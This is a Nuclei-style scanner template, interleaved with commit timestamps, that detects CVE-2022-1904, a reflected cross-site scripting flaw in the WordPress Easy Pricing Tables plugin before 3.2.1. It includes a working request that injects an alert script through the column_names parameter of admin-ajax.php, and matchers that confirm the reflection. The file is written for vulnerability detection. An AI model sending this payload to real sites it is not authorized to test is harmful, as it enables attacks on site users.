2022-06-23 18:11:43 +00:00
id : CVE-2022-1904
info :
2022-09-16 19:50:10 +00:00
name : WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting
2022-06-23 18:11:43 +00:00
author : Akincibor
2022-09-16 20:03:07 +00:00
severity : medium
2022-06-25 07:14:58 +00:00
description : |
2022-09-16 19:50:10 +00:00
WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled.
2022-06-23 18:11:43 +00:00
reference :
- https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1904
2022-07-08 19:19:42 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1904
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-06-23 18:19:29 +00:00
metadata :
2022-07-08 19:19:42 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss
2022-06-23 18:11:43 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<script>alert(document.domain)</script> - Color'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14